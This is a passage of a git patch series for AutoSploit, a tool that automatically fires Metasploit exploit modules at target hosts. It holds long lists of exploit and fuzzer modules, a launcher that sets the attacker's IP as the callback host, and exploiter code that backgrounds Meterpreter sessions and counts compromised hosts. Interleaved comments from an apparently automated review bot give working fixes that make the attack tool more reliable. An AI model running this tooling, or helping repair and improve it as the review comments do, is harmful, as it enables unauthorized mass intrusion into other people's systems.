"exploit/windows/mssql/mssql_payload ", - "exploit/windows/mssql/mssql_payload_sqli ", - "exploit/windows/mysql/mysql_mof ", - "exploit/windows/mysql/mysql_start_up ", - "exploit/windows/mysql/mysql_yassl_hello", - "exploit/windows/mysql/scrutinizer_upload_exec ", - "exploit/windows/postgres/postgres_payload ", - "exploit/windows/scada/realwin_on_fcs_login", - "exploit/multi/http/rails_actionpack_inline_exec", - "exploit/multi/http/rails_dynamic_render_code_exec", - "exploit/multi/http/rails_json_yaml_code_exec", - "exploit/multi/http/rails_secret_deserialization", - "exploit/multi/http/rails_web_console_v2_code_exec", - "exploit/multi/http/rails_xml_yaml_code_exec", - "exploit/multi/http/rocket_servergraph_file_requestor_rce", - "exploit/multi/http/phpmoadmin_exec", - "exploit/multi/http/phpmyadmin_3522_backdoor", - "exploit/multi/http/phpmyadmin_preg_replace", - "exploit/multi/http/phpscheduleit_start_date", - "exploit/multi/http/phptax_exec", - "exploit/multi/http/phpwiki_ploticus_exec", - "exploit/multi/http/plone_popen2", - "exploit/multi/http/pmwiki_pagelist", - "exploit/multi/http/joomla_http_header_rce", - "exploit/multi/http/novell_servicedesk_rce", - "exploit/multi/http/oracle_reports_rce", - "exploit/multi/http/php_utility_belt_rce", - "exploit/multi/http/phpfilemanager_rce", - "exploit/multi/http/processmaker_exec", - "exploit/multi/http/rocket_servergraph_file_requestor_rce", - "exploit/multi/http/spree_search_exec", - "exploit/multi/http/spree_searchlogic_exec", - "exploit/multi/http/struts_code_exec_parameters", - "exploit/multi/http/vtiger_install_rce", - "exploit/multi/http/werkzeug_debug_rce", - "exploit/multi/http/zemra_panel_rce", - "exploit/multi/http/zpanel_information_disclosure_rce", - "exploit/multi/http/joomla_http_header_rce", - "exploit/unix/webapp/joomla_akeeba_unserialize", - "exploit/unix/webapp/joomla_comjce_imgmanager", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce", - "exploit/unix/webapp/joomla_media_upload_exec", - 
"exploit/multi/http/builderengine_upload_exec", - "exploit/multi/http/caidao_php_backdoor_exec", - "exploit/multi/http/atutor_sqli ", - "exploit/multi/http/ajaxplorer_checkinstall_exec", - "exploit/multi/http/apache_activemq_upload_jsp", - "exploit/unix/webapp/wp_lastpost_exec", - "exploit/unix/webapp/wp_mobile_detector_upload_execute", - "exploit/multi/http/axis2_deployer", - "exploit/unix/webapp/wp_foxypress_upload", - "exploit/linux/http/tr064_ntpserver_cmdinject", - "exploit/linux/misc/quest_pmmasterd_bof", - "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload", - "exploit/unix/webapp/php_xmlrpc_eval", - "exploit/unix/webapp/wp_admin_shell_upload", - "exploit/linux/http/sophos_wpa_sblistpack_exec", - "exploit/linux/local/sophos_wpa_clear_keys", - "exploit/multi/http/zpanel_information_disclosure_rce", - "auxiliary/admin/cisco/cisco_asa_extrabacon", - "auxiliary/admin/cisco/cisco_secure_acs_bypass", - "auxiliary/admin/cisco/vpn_3000_ftp_bypass", - "exploit/bsdi/softcart/mercantec_softcart ", - "exploit/freebsd/misc/citrix_netscaler_soap_bof", - "exploit/freebsd/samba/trans2open", - "exploit/linux/ftp/proftp_sreplace ", - "exploit/linux/http/dcos_marathon", - "exploit/linux/http/f5_icall_cmd", - "exploit/linux/http/fritzbox_echo_exec", - "exploit/linux/http/gitlist_exec", - "exploit/linux/http/goautodial_3_rce_command_injection", - "exploit/linux/http/ipfire_bashbug_exec", - "exploit/linux/http/ipfire_oinkcode_exec", - "exploit/linux/http/ipfire_proxy_exec", - "exploit/linux/http/kaltura_unserialize_rce", - "exploit/linux/http/lifesize_uvc_ping_rce", - "exploit/linux/http/nagios_xi_chained_rce", - "exploit/linux/http/netgear_dgn1000_setup_unauth_exec", - "exploit/linux/http/netgear_wnr2000_rce ", - "exploit/linux/http/nuuo_nvrmini_auth_rce", - "exploit/linux/http/nuuo_nvrmini_unauth_rce", - "exploit/linux/http/op5_config_exec", - "exploit/linux/http/pandora_fms_exec", - "exploit/linux/http/pineapple_preconfig_cmdinject", - 
"exploit/linux/http/seagate_nas_php_exec_noauth", - "exploit/linux/http/symantec_messaging_gateway_exec", - "exploit/linux/http/trendmicro_imsva_widget_exec", - "exploit/linux/http/trueonline_billion_5200w_rce", - "exploit/linux/http/trueonline_p660hn_v1_rce", - "exploit/linux/http/trueonline_p660hn_v2_rce", - "exploit/linux/http/vcms_upload", - "exploit/linux/misc/lprng_format_string", - "exploit/linux/misc/mongod_native_helper", - "exploit/linux/misc/ueb9_bpserverd", - "exploit/linux/mysql/mysql_yassl_getname", - "exploit/linux/pop3/cyrus_pop3d_popsubfolders", - "exploit/linux/postgres/postgres_payload", - "exploit/linux/pptp/poptop_negative_read", - "exploit/linux/proxy/squid_ntlm_authenticate", - "exploit/linux/samba/lsa_transnames_heap", - "exploit/linux/samba/setinfopolicy_heap", - "exploit/linux/samba/trans2open", - "exploit/multi/elasticsearch/script_mvel_rce", - "exploit/multi/elasticsearch/search_groovy_script", - "exploit/multi/http/atutor_sqli", - "exploit/multi/http/axis2_deployer", - "exploit/multi/http/familycms_less_exe", - "exploit/multi/http/freenas_exec_raw", - "exploit/multi/http/gestioip_exec", - "exploit/multi/http/glassfish_deployer", - "exploit/multi/http/glpi_install_rce", - "exploit/multi/http/joomla_http_header_rce ", - "exploit/multi/http/makoserver_cmd_exec", - "exploit/multi/http/novell_servicedesk_rc", - "exploit/multi/http/oracle_reports_rce", - "exploit/multi/http/php_utility_belt_rce", - "exploit/multi/http/phpfilemanager_rce", - "exploit/multi/http/phpmyadmin_3522_backdoor", - "exploit/multi/http/phpwiki_ploticus_exec", - "exploit/multi/http/processmaker_exec", - "exploit/multi/http/rails_actionpack_inline_exec", - "exploit/multi/http/rails_dynamic_render_code_exec", - "exploit/multi/http/rails_secret_deserialization", - "exploit/multi/http/rocket_servergraph_file_requestor_rce", - "exploit/multi/http/simple_backdoors_exec", - "exploit/multi/http/spree_search_exec", - "exploit/multi/http/spree_searchlogic_exec", - 
"exploit/multi/http/struts2_rest_xstream", - "exploit/multi/http/struts_code_exec", - "exploit/multi/http/struts_code_exec_classloader", - "exploit/multi/http/struts_code_exec_parameters", - "exploit/multi/http/struts_dev_mode", - "exploit/multi/http/sysaid_auth_file_upload", - "exploit/multi/http/tomcat_jsp_upload_bypass", - "exploit/multi/http/vtiger_install_rce", - "exploit/multi/http/werkzeug_debug_rce", - "exploit/multi/http/zemra_panel_rce", - "exploit/multi/http/zpanel_information_disclosure_rce", - "exploit/multi/ids/snort_dce_rpc", - "exploit/multi/misc/batik_svg_java", - "exploit/multi/misc/pbot_exec", - "exploit/multi/misc/veritas_netbackup_cmdexec", - "exploit/multi/mysql/mysql_udf_payload", - "exploit/multi/php/php_unserialize_zval_cookie", - "exploit/unix/http/freepbx_callmenum", - "exploit/unix/http/lifesize_room", - "exploit/unix/http/pfsense_clickjacking", - "exploit/unix/http/pfsense_group_member_exec", - "exploit/unix/http/tnftp_savefile", - "exploit/unix/misc/polycom_hdx_traceroute_exec", - "exploit/unix/webapp/awstats_migrate_exec", - "exploit/unix/webapp/carberp_backdoor_exec", - "exploit/unix/webapp/citrix_access_gateway_exec", - "exploit/unix/webapp/dogfood_spell_exec", - "exploit/unix/webapp/invision_pboard_unserialize_exec", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce", - "exploit/unix/webapp/mybb_backdoor", - "exploit/unix/webapp/opensis_modname_exec", - "exploit/unix/webapp/oscommerce_filemanager", - "exploit/unix/webapp/piwik_superuser_plugin_upload", - "exploit/unix/webapp/tikiwiki_upload_exec", - "exploit/unix/webapp/webtester_exec", - "exploit/unix/webapp/wp_phpmailer_host_header", - "exploit/unix/webapp/wp_total_cache_exec", - "exploit/windows/antivirus/symantec_endpoint_manager_rce", - "exploit/windows/http/ektron_xslt_exec", - "exploit/windows/http/ektron_xslt_exec_ws", - "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", - "exploit/windows/http/hp_autopass_license_traversal", - 
"exploit/windows/http/manage_engine_opmanager_rce", - "exploit/windows/http/netgear_nms_rce", - "exploit/windows/http/sepm_auth_bypass_rce", - "exploit/windows/http/trendmicro_officescan_widget_exec", - "exploit/windows/iis/iis_webdav_upload_asp", - "exploit/windows/iis/msadc", - "exploit/windows/misc/manageengine_eventlog_analyzer_rce", - "exploit/windows/novell/file_reporter_fsfui_upload", - "exploit/windows/scada/ge_proficy_cimplicity_gefebt", - "exploit/windows/smb/ipass_pipe_exec", - "exploit/windows/smb/smb_relay", - "auxiliary/sqli/oracle/jvm_os_code_10g", - "auxiliary/sqli/oracle/jvm_os_code_11g" - ] -} diff --git a/run_autosploit.sh b/run_autosploit.sh index 98ae47d..46ef6e8 100644 --- a/run_autosploit.sh +++ b/run_autosploit.sh @@ -12,4 +12,5 @@ LPORT=$2 LHOST=`dig +short @resolver1.opendns.com myip.opendns.com` TIMESTAMP=`date +%s` -python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/other_modules.json +python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" +$LHOST $LPORT -f etc/json/default_modules.json From 6e01b923b983191f1a4dae76645a33da7c17fed1 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 13:12:19 -0400 Subject: [PATCH 5/9] Fixed bash script args (2) --- dryrun_autosploit.sh | 1 + run_autosploit.sh | 1 + 2 files changed, 2 insertions(+) diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh index 137d5a2..28f126a 100644 --- a/dryrun_autosploit.sh +++ b/dryrun_autosploit.sh @@ -4,6 +4,7 @@ if [[ $# -lt 2 ]]; then echo "Syntax:" echo -e "\t./dryrun_autosploit.sh " + exit 1 fi WHITELIST=$1 diff --git a/run_autosploit.sh b/run_autosploit.sh index 46ef6e8..aae1209 100644 --- a/run_autosploit.sh +++ b/run_autosploit.sh @@ -4,6 +4,7 @@ if [[ $# -lt 2 ]]; then echo "Syntax:" echo -e "\t./run_autosploit.sh " + exit 1 fi WHITELIST=$1 From 1790c151901f3e38ed1644a639c68fe6cf348d6b Mon Sep 17 00:00:00 2001 
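Review bot: The new `python autosploit.py ...` invocation in hunk `@@ -12,4 +12,5 @@` is broken across two lines without a trailing backslash, so the second line `$LHOST $LPORT -f etc/json/default_modules.json` runs as its own command (bash tries to execute the value of LHOST as a program) and autosploit is started without its LHOST/LPORT arguments; PATCH 6/9 below rejoins the line. The same hunk also switches the module file from other_modules.json to default_modules.json, which is worth a sentence in the commit message since it changes which modules the run uses.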
From: selora Date: Mon, 9 Apr 2018 13:12:19 -0400 Subject: [PATCH 6/9] Fixed bash script args (2) --- dryrun_autosploit.sh | 1 + run_autosploit.sh | 4 ++-- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh index 137d5a2..28f126a 100644 --- a/dryrun_autosploit.sh +++ b/dryrun_autosploit.sh @@ -4,6 +4,7 @@ if [[ $# -lt 2 ]]; then echo "Syntax:" echo -e "\t./dryrun_autosploit.sh " + exit 1 fi WHITELIST=$1 diff --git a/run_autosploit.sh b/run_autosploit.sh index 46ef6e8..b573908 100644 --- a/run_autosploit.sh +++ b/run_autosploit.sh @@ -4,6 +4,7 @@ if [[ $# -lt 2 ]]; then echo "Syntax:" echo -e "\t./run_autosploit.sh " + exit 1 fi WHITELIST=$1 @@ -12,5 +13,4 @@ LPORT=$2 LHOST=`dig +short @resolver1.opendns.com myip.opendns.com` TIMESTAMP=`date +%s` -python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" -$LHOST $LPORT -f etc/json/default_modules.json +python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/default_modules.json From 46b3e899a1e29c04ad1955d70ed5edb4ee693892 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 16:36:24 -0400 Subject: [PATCH 7/9] Bugfix and improvements: Successful exploits will start meterpreter in background. Counter for successful exploits/failed exploits bug, couting output lines, not success/failure occurence --- etc/json/default_modules.json | 2 -- lib/exploitation/exploiter.py | 13 +++++++++---- 2 files changed, 9 insertions(+), 6 deletions(-) diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json index f0e5a65..e59d795 100644 --- a/etc/json/default_modules.json +++ b/etc/json/default_modules.json 
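Review bot: The rejoined `+python autosploit.py ...` line in hunk `@@ -12,5 +13,4 @@` still passes `$WHITELIST`, `$LHOST` and `$LPORT` unquoted, and `LHOST` comes from a `dig +short` against an external resolver that prints nothing when the lookup fails; an empty LHOST then silently shifts the positional arguments so `$LPORT` is taken as the host. Guard it before the call, `[[ -n "$LHOST" ]] || { echo "could not determine LHOST" >&2; exit 1; }`, and quote the expansions: `python autosploit.py --whitelist "$WHITELIST" -e -C "msf_autorun_${TIMESTAMP}" "$LHOST" "$LPORT" -f etc/json/default_modules.json`. The `$#` check in hunk `@@ -4,6 +4,7 @@` validates only the argument count, not that the second argument is a numeric port, so a bad value still reaches autosploit.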
@@ -146,7 +146,6 @@ "auxiliary/admin/cisco/vpn_3000_ftp_bypass", "exploit/bsdi/softcart/mercantec_softcart ", "exploit/freebsd/misc/citrix_netscaler_soap_bof", - "exploit/freebsd/samba/trans2open", "exploit/linux/ftp/proftp_sreplace ", "exploit/linux/http/dcos_marathon", "exploit/linux/http/f5_icall_cmd", @@ -183,7 +182,6 @@ "exploit/linux/proxy/squid_ntlm_authenticate", "exploit/linux/samba/lsa_transnames_heap", "exploit/linux/samba/setinfopolicy_heap", - "exploit/linux/samba/trans2open", "exploit/multi/elasticsearch/script_mvel_rce", "exploit/multi/elasticsearch/search_groovy_script", "exploit/multi/http/atutor_sqli", diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index 97e3e6e..cc61101 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py @@ -121,7 +121,7 @@ def start_exploit(self): "setg threads 20\n" "set rhost {rhost}\n" "set rhosts {rhosts}\n" - "run\n" + "run -z\n" "exit\n" ) @@ -157,11 +157,16 @@ def start_exploit(self): ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]') msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)]) - msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x)]) + msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x) or + 'Meterpreter' in x or + 'Session' in x or + 'Sending stage' in x]) msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)]) - win_total += len(msf_wins) - fail_total += len(msf_fails) + if len(msf_wins): + win_total += 1 + if len(msf_fails): + fail_total += 1 csv_file = csv.writer(f, quoting=csv.QUOTE_ALL) csv_file.writerow([rhost, From 14153aa7e4286817023edb43eebc5d4abdb0979b Mon Sep 17 00:00:00 2001 
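Review bot: The new `'Session' in x` clause in the `msf_wins` filter (hunk `@@ -157,11 +157,16 @@`) matches any output line containing that word, so a line that merely mentions a session, including a notice that none was created if the console capitalises it, is counted as a win; pairing it with the success marker, e.g. `re.search(r'\[\+\]', x) or ('Session' in x and 'opened' in x)`, is tighter — confirm the exact phrasing against the console output being parsed. The `'\[\+\]'`, `'\[-\]'` and `'\[.\]'` patterns are non-raw strings, which raises an invalid-escape DeprecationWarning on Python 3.6+; write them as `r'\[\+\]'` and friends. `if len(msf_wins):` is simply `if msf_wins:` in Python. The enclosing `start_exploit` body begins and ends outside the hunk.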
From: selora Date: Mon, 9 Apr 2018 16:40:40 -0400 Subject: [PATCH 8/9] Added a fuzzers-only json file --- etc/json/fuzzers.json | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 etc/json/fuzzers.json diff --git a/etc/json/fuzzers.json b/etc/json/fuzzers.json new file mode 100644 index 0000000..b606973 --- /dev/null +++ b/etc/json/fuzzers.json @@ -0,0 +1,25 @@ +{ + "exploits": [ + "auxiliary/fuzzers/dns/dns_fuzzer", + "auxiliary/fuzzers/ftp/client_ftp", + "auxiliary/fuzzers/ftp/ftp_pre_post", + "auxiliary/fuzzers/http/http_form_field", + "auxiliary/fuzzers/http/http_get_uri_long", + "auxiliary/fuzzers/http/http_get_uri_strings", + "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", + "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", + "auxiliary/fuzzers/smb/smb_create_pipe", + "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", + "auxiliary/fuzzers/smb/smb_negotiate_corrupt ", + "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", + "auxiliary/fuzzers/smb/smb_tree_connect", + "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", + "auxiliary/fuzzers/smtp/smtp_fuzzer", + "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", + "auxiliary/fuzzers/ssh/ssh_version_15", + "auxiliary/fuzzers/ssh/ssh_version_2", + "auxiliary/fuzzers/ssh/ssh_version_corrupt", + "auxiliary/fuzzers/tds/tds_login_corrupt", + "auxiliary/fuzzers/tds/tds_login_username" + ] +} From 5d47234b32cd827c9613c827dae54f276d920c06 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 16:46:17 -0400 Subject: [PATCH 9/9] More bugfixes: Exploiter now grepping escaped MSF output for success/failures. ANSI escape sequences are now properly ignored --- lib/exploitation/exploiter.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index cc61101..55f94bb 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py 
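Review bot: `"auxiliary/fuzzers/smb/smb_negotiate_corrupt "` in the new fuzzers.json carries a trailing space inside the string; unless the loader strips module names, the path handed to msfconsole will not resolve and that entry is silently skipped, so drop the space (the same trailing-space pattern appears in other module lists in this series, e.g. `"exploit/multi/http/joomla_http_header_rce "`). The key is still named `exploits` although every entry is an auxiliary fuzzer; that is fine if it is the only key the loader reads, but since JSON cannot carry a comment it deserves a line in the project's documentation so nobody "fixes" the key name and breaks loading.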
@@ -157,11 +157,13 @@ def start_exploit(self): ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]') msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)]) - msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x) or + + msf_wins = linesep.join([ansi_escape.sub('', x) for x in msf_output_lines if re.search('\[\+\]', x) or 'Meterpreter' in x or 'Session' in x or 'Sending stage' in x]) - msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)]) + + msf_fails = linesep.join([ansi_escape.sub('', x) for x in msf_output_lines if re.search('\[-\]', x)]) if len(msf_wins): win_total += 1
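Review bot: The rewritten `msf_wins` and `msf_fails` comprehensions iterate `msf_output_lines`, but that name is bound two lines earlier to a single string produced by `linesep.join(...)`, so `x` is one character at a time: `re.search('\[\+\]', x)`, `'Meterpreter' in x` and the other tests can never match, both strings are always empty, and the `win_total`/`fail_total` counters below stop incrementing (the previous patch iterated `output`, which worked but matched against lines that still contained ANSI codes). Keep the stripped lines as a list and derive all three strings from it, as below. The lines after `win_total += 1` (the `fail_total` branch and the CSV write) are outside the hunk, and `start_exploit` starts before it.
```python
ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
# Strip colour codes once, then classify the cleaned lines from the list,
# not from the joined string (iterating a str yields characters).
clean_lines = [ansi_escape.sub('', x) for x in output if re.search(r'\[.\]', x)]
msf_output_lines = linesep.join(clean_lines)

msf_wins = linesep.join([x for x in clean_lines if re.search(r'\[\+\]', x) or
                         'Meterpreter' in x or
                         'Session' in x or
                         'Sending stage' in x])

msf_fails = linesep.join([x for x in clean_lines if re.search(r'\[-\]', x)])
# … unchanged: win_total / fail_total counters and CSV write …
```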